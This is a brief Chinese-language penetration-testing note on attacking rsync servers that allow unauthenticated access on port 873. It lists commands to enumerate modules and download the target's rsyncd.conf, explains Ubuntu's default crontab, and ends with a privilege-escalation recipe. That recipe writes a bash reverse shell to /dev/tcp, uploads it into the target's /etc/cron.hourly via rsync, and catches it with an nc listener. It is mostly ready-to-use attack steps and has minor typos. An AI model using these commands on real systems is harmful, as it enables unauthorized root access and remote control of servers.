介绍:Rsync是linux下一款数据备份工具,默认开启873端口
利用条件:rsync未授权
列出模板
rsync rsync://目标ip:873/
列出模块src下的文件
rsync rsync://目标ip:873/
rsync下的配置文件/etc/rsynd.conf到本机的/root/1.conf
rsync -av rsync://目标ip:873/src/etc/rsyncd.conf /root/1.conf
ubuntu的定时任务默认文件:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
17 * * * * root cd / && run-parts --report /etc/cron.hourly的意思是:每小时的第17分钟执行run-parts --report /etc/cron.hourly命令
查看rsync下配置文件,是以什么权限运行的:
rsync -av rsync://目标ip:873/src/etc/rsyncd.conf 1.conf
cat 1.conf
提权:
1、创建一个shell文件,内容为bash bash -i >& /dev/tcp/ip/port 0>&1
2、赋予执行权限:chomd +x shell
3、上传文件到定时任务目录下rsync -av shell rsync://192.168.1.143:873/src/etc/cron.hourly
4、进行nc 监听相应的端口
